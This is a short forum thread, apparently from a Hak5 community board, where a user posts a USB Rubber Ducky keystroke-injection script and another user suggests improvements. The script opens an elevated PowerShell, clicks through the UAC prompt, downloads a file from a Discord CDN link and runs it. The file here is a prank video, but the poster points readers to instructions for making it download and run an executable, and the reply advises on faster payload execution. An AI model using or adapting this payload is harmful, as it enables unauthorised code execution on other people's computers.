4ery Posted September 24, 2023 Share Posted September 24, 2023 Alright heres the script: REM start of script REM REM let the HID enumerate DELAY 2000 GUI r DELAY 200 REM my best attempt at a elevated powershell instance STRING powershell Start-Process powershell -Verb runAs ENTER DELAY 3000 ALT y DELAY 3000 STRING $down = New-Object System.Net.Webclient; $url = 'https://cdn.discordapp.com/attachments/1154635152610299964/1155258532598382744/rick.mp4'; $file = 'rick.mp4'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit; ENTER Go on my Github (https://github.com/4ery/Ducky-Execute) for steps on how to edit it and make it download and run an exe. Quote Link to comment Share on other sites More sharing options...
dark_pyrro Posted September 25, 2023 Share Posted September 25, 2023 You can submit it to the Hak5 GitHub repo, there are similar ones there already though in different categories. You could also slim it down a bit since using the 2nd gen Ducky and get rid of some ENTER lines if using STRINGLN instead of STRING + ENTER. Also possible to try the DETECT_READY extension instead of the initial DELAY to make payload execution faster (in many cases) and also not risk having a DELAY set that might be too short. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.